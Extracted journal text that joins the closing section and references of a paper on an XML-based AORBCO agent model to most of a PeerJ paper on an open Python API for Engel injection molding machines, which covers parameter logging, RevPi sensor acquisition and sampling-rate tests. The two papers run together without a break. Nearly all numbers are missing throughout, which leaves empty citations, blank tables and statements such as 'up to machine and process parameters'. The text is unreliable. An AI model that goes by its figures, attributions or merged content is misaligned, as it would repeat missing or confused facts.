a detailed description of the wishes is as follows: <desire> <desire_name/> …… </desire> e. description of the plan <plan /> is the best set of action sequences that the agent can make at present according to the agent's ability. each plan consists of a desire name <desire_name/> and an action list, each composed of <action name> and an actual argument list <arguments />. <desire_name/> represents a plan for desire. the detailed description of the plan is as follows: <plan> <desire_name> <action_name> <arguments/> </action_name> ...... </desire_name> ...... </plan> f. description of the behavior control mechanism <behavior_controller/> is the behavioral control mechanism of agent. it modifies its own beliefs and forms a wish through the perception of the environment, which is planned and implemented by the desire, according to its own ability or through interaction with acquaintances. in the process of implementation, it modify its beliefs and abilities and organize the other parts to make agents self-aware. v. conclusion in this paper, the original aorbco model is improved to form a new aorbco intelligent model with agent as the core, which can describe intelligent self-awareness, mutual representation, fuzziness and dynamics more accurately; based on xml, the definition language of aorbco intelligent model is defined so that the expression content and form of resources are unified so that people and computers can understand the semantics of language components. the behavior control mechanism in aorbco model integrates the agent's beliefs, abilities, wishes and programs into one. it is the core of simulating human self-learning, interaction and collaboration, planning decision-making and execution control. it will become the focus of our research in the future. acknowledgment support project of shaanxi provincial science and technology department ( gy- ); the special scientific research project of the shaanxi provincial education department ( jk ); new network and detection control national local joint engineering laboratory fund project (gsysj ) references [ ] luo junmin, zheng shouqi, zhong lianjiong. ontology and aorbco model [j]. microelectronics and computer,vol. , ( ):pp. - . [ ] luo junmin, zheng shouqi. intelligent and intelligent model [j]. computer engineering and application, , vol. ( ):pp. - . [ ] luo junmin, wu yuyun, wu bin. fuzzy ontology and its evolutionary research [j]. microelectronics and computer, , vol. ( ):pp. - . [ ] luo junmin, wang lei. research on the dynamic ontology architecture based on the interaction [j]. microelectronics and computer, , vol. ( ):pp. - . [ ] luo junmin, li junwei. research on agent self-consciousness [j]. microelectronics and computer, , vol. ( ):pp. - . [ ] xiao kunshou, li de-shun, ontology. encyclopedia of china, vol. Ⅰ philosophy. - [ ] feng zhiyong, li wenjie, li xiaohong. ontology engineering and its application. beijing: tsinghua university press. . . [ ] bratman, m.e. ( ) [ ]. intention, plans, and practical reason. csli publications. isbn - - - . [ ] ring m, orseau l. machine learning in an agent: a generic model and an intelligent agent -based on inductive decision learning [j]. journal of artificial intelligence, , vol. ( ) : pp. - . [ ] taixu. jurisprudence [m]. business press, . [ ] nils.nilsson (author), wang fei, zhao xueliang (translator). understanding faith. mechanical industry press. . . [ ] gasser l, braganza c, herman n. chapter -- mace: a flexible testbed for distributed ai research[j]. 
distributed artificial intelligence, :pp. - . [ ] sun shengtao, lu jiasheng. self-consciousness and its research overview [j]. psychological exploration, , vol. ( ): pp. - . https://en.wikipedia.org/wiki/center_for_the_study_of_language_and_information https://en.wikipedia.org/wiki/international_standard_book_number https://en.wikipedia.org/wiki/special:booksources/ - - - submitted march accepted september published november corresponding author olga ogorodnyk, olga.ogorodnyk@ntnu.no academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright ogorodnyk et al. distributed under creative commons cc-by . open access towards a general application programming interface (api) for injection molding machines olga ogorodnyk , mats larsen , ole vidar lyngstad and kristian martinsen department of manufacturing and civil engineering, norwegian university of science and technology (ntnu), gjøvik, norway sintef manufacturing, raufoss, norway abstract injection molding is a complicated process, and the final part quality depends on many machine and process parameters settings. to increase controllability of the injection molding process, acquisition of the process data is necessary. this paper describes the architecture and development of a prototype of an open application programming interface (api) for injection molding machines (imms), which has the potential to be used with different imms to log and set the necessary process parameter values. at the moment, the api includes an implementation of emi data exchange protocol and can be used with engel imms with cc and rc controllers. data collection of up to machine and process parameters (the number might vary depending on the type of machine at hand), obtained from sensors installed in the machine by the manufacturer is allowed. the api also includes a module for the acquisition of data from additional d party sensors. industrial raspberry pi (revpi) was used to perform analog-to- digital signal conversion and make sensors data accessible via the api prototype. the logging of parameters from the machine and from sensors is synchronized and the sampling frequency can be adjusted if necessary. the system can provide soft real-time communication. subjects real-time and embedded systems, scientific computing and simulation keywords application programming interface (api), data acquisition system, injection molding, open source, industry . , cyber-physical systems introduction manufacturing systems gradually become more sophisticated due to an increasing demand on quality of manufactured products, production system performance, as well as economic profitability (yin et al., ). therefore, data acquisition, process monitoring and control are becoming more and more important in the manufacturing industry (negri, fumagalli & macchi, ). a significant number of studies stress the importance of collection and analysis of data from different manufacturing processes and injection molding is no exception (vrabič, kozjek & butala, ). the concepts of industry . and cyber-physical systems (cps) are important drivers for this development. it is becoming increasingly common to demand machine tools equipped with sensors from the machine tool manufacturers, and later to add sensors from the d party sensor suppliers. appropriate sensors in machine tools, dies and molds can provide how to cite this article ogorodnyk o, larsen m, lyngstad ov, martinsen k. . 
towards a general application programming inter- face (api) for injection molding machines. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:olga.ogorodnyk@ntnu.no https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. useful information such as temperature and pressure, while communication protocols, e.g., mtconnect and opc/ua allow the recording of the necessary controller signals (lee, kao & yang, ). using data acquired from these sensors can assist quality control routines and could establish models for suggestion of optimal process parameters (zhao et al., ), decrease scrap rates and energy usage through the elimination of production cycles that produce defect parts and minimize unwanted ‘‘manual adjustments and variations on product quality’’ (saldivar et al., ). before the start of the production of an injection molded part, parameter values such as holding pressure, backpressure, cooling time, injection speed, screw speed and others need to be set. these parameter settings influence the part quality, and erroneous parameter values might cause various defects (zhao et al., ; ogorodnyk & martinsen, ). to aid the operation of the imms, many suppliers offer manufacturing execution systems (mes), which include data logging functions. these systems can be more or less complicated, although they will usually provide such functions as monitoring of machine status, remote access to machine set-up, data logging of machine and process parameters and displaying the data in a feasible way. examples of such systems are tig’s authentig (tig. tig authentig, ), arburg’s host computer system (als) (arburg. host computer system , als), kraussmafei’s maxecution (kraussmaffei. maxecution, ), mes hydra (mdpv. manufacturing execution system hydra, ), sap manuacturing execution (sap. sap manufacturing execution, ) and polmak plastik qmaster (polmak_plastik. polmak plastik products, ). there are, however, challenges for the usage of these systems for analysis and research purposes. . they are rather costly and often compatible only with newer generations of imms and imm controllers. . it might be hard to synchronize data logging from machine built-in sensors with logging of data from d party sensors installed in the mold. . the mes systems often log data only once per production cycle and this might lead to missing information about the process dynamics and peak values of process parameters. . commercially available mes software has a closed architecture that does not always allow to access all the machine and process data of interest, this might be an obstacle in terms of research and advanced process data analysis. therefore, in this article a question of how to design a universal api to control and monitor injection molding for the next generation industrial systems is discussed. a prototype solution of an open api that allows interaction with imm’s control unit is presented and made available through the following repository: https://github.com/sintefmanufacturing/ imm_api. the prototype allows collection of production data through emi data exchange protocol and can be built on to add support for other imms or new data collection functionality. ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com https://github.com/sintefmanufacturing/imm_api https://github.com/sintefmanufacturing/imm_api http://dx.doi.org/ . /peerj-cs. figure research methodology steps. full-size doi: . /peerjcs. /fig- background and requirements to the proposed api the described study is based on four main steps shown in fig. . at first, a problem and requirements analysis was conducted. this included review of several available manufacturing execution systems, communication protocols used for connection of imms to other devices, as well as studies related to the development of similar systems by academia. in addition, the stakeholders’ needs and requirements for an imm api were identified. the primary stakeholders in this case are the companies and research institutions participating in the project, while potential stakeholders include the imm manufacturers, other injection molding companies and researchers. the second step was dedicated to summarizing which models and frameworks are to be used to develop the proposed api prototype and creation of the implementation schemes of the system (uml diagrams). the third step included development of the prototype. in the final step, the system was tested with different sampling frequencies to assess its performance. injection molding process injection molding is one of the most widely used processes for production of polymeric products, as about % of them are manufactured using this process (osswald & hernandez-ortiz, ). it is a cyclic process for production of identical parts through injection of molten material into a mold cavity of a desired shape (zheng, tanner & fan, ). its main advantage is an ability to fabricate high volumes of parts of various sizes and geometries, from the smallest components (micro-injection molding) to entire car body panels. the reciprocating screw imms are mostly used for production of the injection molded parts. their main components are a hopper, a rotating screw, a heated barrel and a clamping unit consisting of a mold typically made of two halves. an injection molding cycle usually includes the following phases: plasticization, injection, packing, cooling and ejection (zheng, tanner & fan, ). during the plasticization stage ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. plastic pellets are fed into the heated barrel through the hopper. here they are melted, mixed and homogenized with help of the reciprocating screw. when enough plastic melt is accumulated, the screw moves forward and forces the molten material into the mold cavity at high velocity and pressure (injection phase). when the mold cavity is – % full, the process switches from the constant velocity to the constant pressure control to avoid pressure spikes. at the point, when the cavity is completely filled, the packing stage starts: the screw stays in the forward position or keeps moving with a small displacement to maintain the necessary holding pressure. the material cools down and shrinks allowing another small portion of the material to enter the cavity. this stage continues until the material in the cavity entrance solidifies. next, the holding pressure is reduced to a value close to zero and the part continues to cool down and solidify (cooling) until the mold is opened and the part is ejected (ejection). 
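the cycle structure just described can be made explicit as a small ordered type, which is convenient when logged samples need to be labelled with the phase they belong to. this is only meant to make the phase sequence explicit and is not taken from the prototype described later.

from enum import Enum

class CyclePhase(Enum):
    # ordered phases of one injection molding cycle, as described above
    PLASTICIZATION = 1
    INJECTION = 2
    PACKING = 3
    COOLING = 4
    EJECTION = 5

def next_phase(phase):
    """return the phase that follows, wrapping around to plasticization after ejection."""
    members = list(CyclePhase)
    return members[(members.index(phase) + 1) % len(members)]

print(next_phase(CyclePhase.PACKING))   # CyclePhase.COOLING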
to achieve a repeatable process that allows production of high quality parts with specific material properties, a significant number of machine and process parameters need to be considered. many of them, however, are dynamic, and adopt a characteristic curve over the production cycle. examples of such parameters are screw speed, rotation speed, material cushion, mold temperature and pressure, etc. most of these parameters can be acquired from the imm sensors installed by its manufacturer, however, some require additional sensors in the molds, as for example, the mold temperature and pressure data. this data is suggested as one of the essential indicators of production of the high quality parts, as it reflects the evolution of the polymer conditions inside the mold, and is used and investigated by both industry and academia (zhao et al., ; kurt et al., ; kurt et al., ; ageyeva, horváth & kovács, ). there are a number of sensors available on the market for installation in molds (piezoelectric/piezoresistive, strain gage, surface mounted thermocouples, ultrasonic sensors, optical sensors, etc.). some of them have operating temperatures that do not allow insertion into the mold cavity and touching the molten material (indirect, contact-free measurement), while others are able to operate in these extreme conditions (direct measurement) (ageyeva, horváth & kovács, ). the frequencies for logging the imm and mold data may differ depending on the further use of this data, as well as on the size of the produced part. for example, if a part is manufactured using micro-injection molding and its cycle time is equal to a couple of seconds, a higher logging frequency might be of interest, however, if a bigger part is produced and the cycle time is longer the frequency of interest might be lower. commercially available mes and solutions proposed by academia mes are computerized systems used in manufacturing to obtain the necessary data from the production floor in order to optimize the production output (mahmoud et al., ). a suitable data exchange protocol needs to be utilized to establish communication between an imm and an mes or a pc. currently, the most widely used protocols are euromap and euromap . euromap was developed in and uses file- based data transfer (euromap, ). euromap was released in and is based on opc/ua to be applied in industry . cases. euromap ’s downside is that it is not directly connected to the imm’s control loop and thus it might not be able to guarantee ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. real-time or soft real-time communication. another example of a data exchange interface is engel machine interface (emi). emi is directly connected to the machine’s control loop via ethernet (tcp/ip protocol) and communication is based on xml byte streams. emi is much faster in comparison to euromap , as emi exchanges data approximately every . s, while euromap exchange period is - s, based on the authors’ experience. there exist a significant number of manufacturing execution systems applicable to injection molding. table shows functionality in terms of the process data collection and openness of some of the mes systems used by the injection molding companies. 
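engel's emi message schema is proprietary and is not reproduced in the paper, so the snippet below only illustrates the general pattern described above: one xml byte stream is sent over a tcp/ip connection and the xml reply is read back. the host, port and request content are placeholders, not real emi traffic.

import socket

def exchange_xml(host, port, request_xml, timeout=2.0):
    """send one xml byte stream over tcp/ip and return the raw reply, emi-style."""
    with socket.create_connection((host, port), timeout=timeout) as conn:
        conn.sendall(request_xml.encode("utf-8"))
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break                      # server closed the connection, reply complete
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")

# placeholder request; a real request would have to follow the proprietary emi schema
request = "<request><parameter name='mold_force'/></request>"
# reply = exchange_xml("192.0.2.50", 9100, request)   # requires a reachable machine, left commented out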
there are, other systems available on the market, however, most of them are similar to each other in a sense that their functionality misses either (a) openness for changes and addition of custom modules developed by the system’s users and not only developers, (b) synchronized acquisition of data from both machine and d party sensors or (c) ability to adjust the sampling rate. the functionality of the available systems could be adjusted to enable realization of (a)–(c), thereby enabling a new use-case of the commercially available systems making them more open and flexible for research and development purposes. when it comes to the solutions proposed by academia, the authors have found only a few examples of the development of open apis capable of solving the above-described challenges. the literature, however, does include examples of systems for the acquisition of data from sensors additionally installed on the imms, and descriptions of rapid testing of novel algorithm prototypes. in (tellaeche & arana, ) a ‘‘flexible data acquisition system that allows rapid implementation of complex algorithms to assess their correct performance and can be integrated in the quality control process’’ is proposed. the system is based on one of national instruments (ni) data acquisition systems (daqs) and is used to log data from two force sensors installed in a mold. no data from in-built machine sensors are being used in this study, due to the inability to access it. a similar case is described in (zhou et al., ), where mold temperature, screw displacement and velocity data are recorded through the installation of additional (not provided by machine manufacturer) sensors in the imm, as well as the mold. in zhao et al. ( ), different types of sensors and probes (thermocouples, displacement and pressure probes) are installed in an injection molding machine and data collection cards are used to transform analog, discrete and temperature signals to the digital ones. most of this data can be acquired from sensors already installed in an imm by its manufacturer, but due to the restriction of commercial software and hardware, new sensors needed to be installed to get easy access to data and to test necessary algorithms and routines developed by researchers. zhang, mao (zhang et al., ), on the other hand, are trying to use some of machine built-in sensors, namely hydraulic pressure sensor to estimate nozzle pressure values and increase controllability of the injection molding process. in (charest, finn & dubay, ) pressure transducers, thermocouples, velocity and position sensors, and flow sensors are installed and ‘‘interfaced using national instruments data acquisition boards and a pc’’ to acquire the imm data. most of these reported studies use systems for data acquisition from d party sensors, and are not using the machine built-in sensors, due to the lack of a suitable way to acquire the data and communicate with the imm controller. development of an open api for the ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison of commercial mes. 
requirement: tig authentig (kraussmaffei, ) | kraussmaffei maxecution (kraussmaffei, ) | arburg host computer system (als) (arburg, ) | mes hydra (mdpv, ) | sap manufacturing execution (sap, ) | polmak plastik qmaster (polmak_plastik, )
open for changes and addition of modules by the user (not producer): no | no | no | no | yes (mostly for business applications) | no
compatibility with euromap , euromap , emi: yes | no | yes | yes | yes | yes
acquisition of machine and process parameters: yes | yes | yes | yes | yes | yes
set values of machine and process parameters: yes | yes | yes | yes | yes | yes
synchronized acquisition of data from built-in and additional sensors: no | no | no | no | no | no
possibility to change sampling rate: no | no | no | no | no | yes
imms by either mes producers or academia would bring new opportunities for research and analysis of the machine and process data.
requirements to an open application programming interface for imms
based on the above-described challenges to the commercially available mes, as well as on the project proposal related to this research, the following functional requirements were formulated:
1. the api should be compatible with different communication protocols (euromap , euromap , emi).
2. the interface should be open so that building upon existing software and rapid algorithm prototyping is possible if/when necessary.
3. the api should be capable of providing real-time or soft real-time logging depending on the end-user's needs. real-time scheduling communication means that missing a data sampling deadline (each . s, for example) is considered an error, while soft real-time means that it is better not to miss the deadline, but it is not an error to do so (lee & seshia, ). in case of the prototype further described in this article, soft real-time logging and a hz sampling rate were required, based on the stakeholders' requirements extracted from the related project proposal.
4. the acquisition of several parameter measurements per production cycle should be ensured.
5. it should be possible to get values of up to desired machine and process parameters of an imm (depending on the imm's model) and additionally installed sensors (if any).
6. the option of setting values of machine and process parameters, where the parameters are accessible, should be provided.
7. the setting of values should not conflict with the imm safety installations, and non-permitted values that are too high or too low shall not overwrite the permitted ones.
8. the developed system should ensure the synchronized acquisition of data from machine built-in sensors and 3rd party sensors. in case of the prototype solution, logging of data from the imm's built-in sensors should be synchronized with the temperature and pressure mold multi-sensors.
in addition, a non-functional requirement such as security needs to be considered: api implementations should ideally allow application-layer security, such as authenticated access over secure http via tls, but this aspect is out of scope for this work. to sum up, a simple, open and safe application programming interface (api) which can get and set values of different parameters on the imm, as well as values from additionally installed/external sensors, should be developed. to meet the above-listed requirements the api needs to include the functions/methods shown in table .
design and implementation of the api’s prototype an api is a software product that includes a number of clearly defined methods for communication between different components, in our case, between an imm, a pc ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table ‘‘parameterlist’’ description. name of method description of method start_logging(sampling_rate) by executing this method the system starts logging imm’s process parameters with specified by a user sampling rate. ‘‘sampling_rate’’ parameter is the user-desired sampling rate in hz. the logging sequence is stopped by launching the idle() method. get_process_param(names) this method returns actual and set values of chosen process parameter or list of parameters. parameter name(s) is/are given as ‘‘names’’ argument of the method. this method is independent of the control loop. get_async_act_sample(params) returns unsynchronized current value(s) of process parameter(s). name of one or more parameters are given as ‘‘params’’ argument of the method. method is independent of the control loop. set_process_param(name,value) this method sets a desired value of a specified process parameter on the imm. arguments ‘‘name’’ and ‘‘value’’ mean respectively process parameter’s name and desired value of that parameter. get_samples(number_of_shots) method returns data sampled during certain number of production cycles (shots) buffered in a fifo queue. ‘‘number_of_shots’’ parameter defines how many shots/cycles in the past user is interested in. event() set api’s state to an event, can be launched externally with method event_sample(). event_sample() trigger an event based sampling. the state has to be an event. idle() set interface’s state to idle, a passive state where the connection is maintained. disconnect() connection is ended and the api is shut down. and/or a data acquisition system connected to mold sensors. to develop the proposed api prototype, the unified process methodology for software development has been followed. this methodology includes four main phases: inception, elaboration, construction and transition (jacobson, booch & rumbaugh, ). the python programming language was chosen to program all the prototype modules, as it is easy to use, has a number of versatile features and libraries, can be utilized to practice distributed computing and be further extended in c++ or c. the imm used in this study supports euromap and emi data exchange protocols. as mentioned before, emi is capable of exchanging data significantly faster than euromap , therefore, it was selected to be used in the prototype implementation. pcmef (presentation, control, domain and foundation) architectural framework (maciaszek & liong, ; madeyski & sochmialek, ) was applied for development of the api prototype’s distributed architecture. at the same time, the osi layer model (open systems interconnection model) (kurose & ross, ) was followed for the creation of the communication design of the api, since the emi exchange protocol is also based on this model. ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure open api for imm architecture diagram. full-size doi: . /peerjcs. /fig- description of the proposed system the proposed prototype api includes database and system apis, which combines imm interface and data acquisition system for additional sensors (daq interface) modules, as shown in fig. . 
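taken together, the methods of the parameterlist table can be captured as one abstract contract, so that back-ends for different machines or protocols expose the same calls. the sketch below lists them as a python abstract base class; the method names and arguments follow the table, while anything beyond that (return types, how the class is exposed remotely) is an assumption for illustration.

from abc import ABC, abstractmethod

class IMMInterface(ABC):
    """contract an imm back-end should fulfil, following the parameterlist table."""

    @abstractmethod
    def start_logging(self, sampling_rate): ...      # begin periodic sampling at the given rate in hz

    @abstractmethod
    def get_process_param(self, names): ...          # actual and set values of the named parameters

    @abstractmethod
    def get_async_act_sample(self, params): ...      # unsynchronized current values, outside the control loop

    @abstractmethod
    def set_process_param(self, name, value): ...    # write a set value for one parameter on the machine

    @abstractmethod
    def get_samples(self, number_of_shots): ...      # data buffered for the last n production cycles (fifo queue)

    @abstractmethod
    def event(self): ...                             # switch the interface state to event mode

    @abstractmethod
    def event_sample(self): ...                      # trigger one event-based sample

    @abstractmethod
    def idle(self): ...                              # passive state in which the connection is kept alive

    @abstractmethod
    def disconnect(self): ...                        # end the connection and shut the api down

an implementation of this contract can then be registered as a remote object (the prototype uses pyro for that purpose), so the same calls are available both to local scripts and to other machines on the network.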
the system api is used ( ) for the establishment of a connection with the injection molding machine and requesting and setting the corresponding parameter values, ( ) for acquisition of data from any additionally installed machine and mold sensors. note that the data from the imm is only accessed through establishment of connection with the imm and not acquired directly from the imm sensors. this is due to a fact that the imm has its own daq that is connected to the installed sensors and is logging their values during the machine runs. the database is needed for organized storage and easy access to sampled data. the api prototype the api prototype uses pyro (pyro, ), xml.etree.elementtree, socket, thread, queue and datetime python libraries, where pyro is python remote objects library that is used to enable distributed computing between network-based objects. the data is logged only when the machine mold is closed in order to minimize the amount of memory used for data storage. to detect the mold closing, a ‘‘mold force’’ parameter is used. the software unit waits until the mold force parameter reaches a value of ≥ kn and then starts data collection. it stops when the mold force parameter value becomes lower than the above-specified value. currently, data from each production cycle (in this case defined as from mold closing to mold opening) are written to a separate file of a user-specified type (.csv, .json, .pickle) and are stored in a folder chosen by a user on the pc connected to the imm. a proper database management unit needs to be further developed and added to the system in future versions, to provide a scalable way of storing process data. ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. accessing the imm parameters data to access the necessary imm parameter values the prototype uses a list of uniform resource identifiers (uris) and their correspondence to different parameters on the imm for the establishment of machine to machine communication. the uris list was obtained from private communication with engel. a .csv file was created that included all uris and machine and process parameters of the imm provided by engel. this file can be updated to enable or disable the collection of certain parameters depending on the necessities of a user. the api prototype can enable three different modes ‘‘idle’’, ‘‘fixed cycles’’ and ‘‘flexible cycles’’ depending on the application. in the ‘‘idle’’ mode controller ensures that connection is up and that application is able to access the interface’s methods for asynchronous interaction, while the ‘‘fixed cycles’’ mode is a periodical sampling mechanism of parameters from the imm that samples all of the parameters simultaneously. the sampling results are available in the queue for the application process. ‘‘flexible cycles’’ mode takes care of the unbalanced update sampling frequencies to avoid oversampling. machine parameters on the imm can have different update frequencies depending on the sampling limitations of the data acquisition system on the imm. these frequencies can also be manipulated by the user via the imm’s general user interface. the updating frequencies typically vary from to ms. at the first run in the ‘‘flexible cycles’’ mode, the interface acquires the sampling frequency of each parameter from the imm and groups parameters that have the same update rate. 
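a simplified sketch of the mold-close-triggered logging described above: sampling starts once the mold force parameter reaches the closing threshold, stops when it drops below it again, and each cycle is written to its own csv file. read_parameters, the threshold value and the file naming are placeholders standing in for the prototype's actual implementation.

import csv
import time
from datetime import datetime

def log_one_cycle(read_parameters, close_threshold_kn=1.0, sampling_rate_hz=10.0, folder="."):
    """wait for the mold to close, sample until it opens again, write the cycle to its own file."""
    period = 1.0 / sampling_rate_hz
    while read_parameters()["mold_force"] < close_threshold_kn:
        time.sleep(period)                         # mold still open, wait for the next cycle to start
    rows = []
    while True:
        sample = read_parameters()                 # one snapshot of all monitored parameters
        rows.append(sample)
        if sample["mold_force"] < close_threshold_kn:
            break                                  # mold opened again, the cycle is finished
        time.sleep(period)
    path = f"{folder}/cycle_{datetime.now():%Y%m%d_%H%M%S}.csv"
    with open(path, "w", newline="") as handle:
        writer = csv.DictWriter(handle, fieldnames=rows[0].keys())
        writer.writeheader()
        writer.writerows(rows)
    return path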
in this mode, the interface checks the last datetime, when each parameter group was updated, and determines if it is time to acquire a new portion of data from the imm. acquisition of additional sensors data when it comes to acquisition of data from sensors additionally installed on an imm or in its molds, the data logging is synchronized. in order to enable the synchronization, the event_sample() method described in table needs to be triggered for both imm and the daq used for the additional sensors data sampling. this study included the use of a mold with two pressure and temperature multi-sensors. figure depicts a typical scenario of the api’s use and interaction of its components, where the necessary parameters data is accessed on the imm and logged from the additional sensors through the revpi. communication with an imm is established through the immproxy module and the d party sensors daq though the daqproxy and the requested parameter values are obtained. evaluation of the api prototype’s performance used hardware in order to develop and test that the application programming interface is able to satisfy requirements specified in ‘‘requirements to an open application programming interface for imms’’, an ‘‘engel insert ’’ vertical injection molding machine with cc control unit was used. a mold for iso - (iso, ) dog bone parts ( mm thickness) with two temperature and pressure kistler multi-sensors type b h p was used to test the ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure interaction sequence diagram showing ordering of calls to the api and underlying calls for data acquisition. full-size doi: . /peerjcs. /fig- system’s performance with different sampling rates. the sensors’ characteristics are shown in table . the dog bone specimen parts (fig. ) are mostly used to define mechanical properties of various materials and are used by both industry and academia for those purposes. to transform analog signals from sensors into digital ones a revpi (revpi, b)— industrial raspberry pi is used, namely revpi core and revpi analog input output (aio) modules. revpi core is a computing unit that uses raspbian jessie as the operating system and preempt-rt patched kernels of version . . -rt -v . revpi aio is an analog input/output extension module for the revpi core which includes necessary analog inputs and outputs to connect to the sensors and to send converted sensor signals to the core unit. the modules are connected through pibridge (revpi’s modules connector). ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure dog bone specimen (iso - ) with mm thickness. full-size doi: . /peerjcs. /fig- table pressure and temperature sensor characteristics. specifications kistler type b h p model measuring chain calibration calibrated by kistler measuring range pressure (bar) .. measuring range temperature (◦c) .. temperature accuracy (◦c) ± diameter (mm) height (mm) . natural frequency (khz) > the revpi aio performs analog-to-digital conversion (adc) with a -bit delta-sigma converter (baker, ) (model ads ) (revpi, a). the reason for choosing revpi is that, unlike commercial daqs from manufacturers like ni and hbm, revpi has a significantly lower cost and is an open, modular industrial ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. 
table statistics of overhead measurement for revpi. sampling rate [hz] mean [s] std. dev. [s] th percentile th percentile overhead over . s [%] . . . . . . . . . . . . . . . . . . . . table statistics of overhead measurement for imm daq. sampling rate [hz] mean [s] std. dev. [s] th percentile th percentile overhead over . s [%] . . . . . . . . . . . . . . . . . . . . pc (revpi, b). due to this, it can provide flexibility in which software alternatives can be used together with it. the biggest disadvantage in comparison to commonly used commercial data acquisition systems is revpi aio’s maximum sampling rate at hz. in practice, the sampling rate can be significantly lower due to load on the pibridge. further on, the update rate of the data values is reduced by a factor of according to the documentation of the revpi. as a result, if the analog-to-digital conversion sampling rate is hz, it will provide an update rate of hz on revpi core . due to this revpi might not be the optimal solution, however, as the described api is a prototype, revpi is a good demonstration tool. system’s performance in terms of real-time and soft real-time logging in order to assess the system’s performance in terms of its ability to comply with different sampling rates, the api was installed on the revpi, where three different processes needed to be handled: handling the imm, handling kistler sensors signals and synchronization of data acquisition from the injection molding machine and mold sensors. all tests were conducted at length of samples for sampling rates at , , and hz. the imm machine was turned on and the revpi was connected to the mold sensors, however, no imm production runs were performed, therefore, most of the parameter values logged are constant or equal to zero. the ability of the system to set the corresponding machine parameter values was not tested during these tests. the collected data can be found in the supplemental files. tables and show the mean, standard deviation, th and th percentiles, as well as the percentage of samples with overhead over . s among the logged sampling rates, while fig. depicts histograms for the corresponding sampling rates data. the overhead was calculated based on the following equation: overhead = ( sampling_rate(real)n+ −sampling_rate(real)n ) −sampling_rate(given), ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure histograms showing observed times for sampling at different rates. (a) daq hz. (b) imm hz. (c) daq hz. (d) imm hz. (e) daq hz (f) imm hz. (g) daq hz (h) imm hz. full-size doi: . /peerjcs. /fig- ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. where sampling_rate(real) is a sampling rate performed by the system for samples n+ and n. based on the results shown in tables and , it is easy to see that real-time restrictions of the system apply. for the test with hz sampling rate, the mean sampling rates that the system performs are around . s ( . hz) on both imm and the revpi. this means that the system cannot comply with the given sampling rate. examining results from sampling at hz, it is possible to see that the system performs better than with hz sampling rate. in this case, the performed mean sampling rate is around . s ( . hz) (for both imm and the revpi). even better results can be seen at sampling rate at hz. here, the average sampling is close to . s or . 
hz, while the number of overhead values over . s is . and . for the revpi and the imm’s daq respectively. this indicates that hz can be one of the appropriate sampling rates for the proposed api. at the same time, hz sampling rate has the mean value for both imm and the revpi at around . s ( . hz). on the imm there are . % of samples that have the overhead value higher than . s, while on the revpi there are none. regarding real-time demands, results show that a number of samples with the overhead value higher than . s are present at logging with any of the tested sampling rates except for the hz rate for the revpi. this happens because the system tries to compensate for the sampling deviation, when launched in the ‘‘flexible cycles’’ mode to avoid oversampling. the revpi demonstrates that it is able to perform real-time sampling with hz or lower sampling rate and soft real-time on higher speeds. to improve the system’s performance in term of the real-time performance a more powerful daq needs to be used. at the same time, api’s unpredictability comes, among other things, from python’s memory management mechanism. it uses reference counting collector and generational garbage collector, known as ‘‘gc module’’ for memory reclaim (pythonsoftwarefoundation, ). unlike many other languages, it does not necessarily release the memory back to the operating system, but instead keeps some parts of already allocated memory for use in the future. it is also possible to see that the imm process is more unpredictable than the revpi process. this is caused by necessity to establish the server/client connection with the imm, while there is no such necessity, when the revpi is directly connected to the sensors and acquires the data from them. it is important to remember that the revpi is used to access and record the imm’s parameter values, while their acquisition is performed by the imm’s internal daq, and only the mold sensors are directly connected and the corresponding signals are logged by the revpi. discussion and future work the developed api prototype complies with requirements that were defined in ‘‘requirements to an open application programming interface for imms’’ and is a modular system open for any necessary changes. its openness is the main difference between the proposed api and commercially available systems with similar functionality. it is possible to see from table that listed commercial mes (except sap manufacturing ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. execution (sap. sap manufacturing execution, )) do not include the possibility of adding any modules developed by the system’s user, unless a new module is bought from the software producer. at the same time, they also do not allow to change parameters sampling rate and synchronization of data acquisition from built-in or external sensors. the open api prototype, on the other hand, can be modified to include additional modules. the use of these modules can assist in increasing the quality yield and the overall controllability of the injection molding process. the open application programming interface is developed to simplify data collection and processing for optimization of the injection molding process and bring imms closer to being cyber-physical systems capable of self-regulation and self-control. keeping in mind operational safety, it should be noted that the prototype does not in any way hinder operation of the imm’s own control system. 
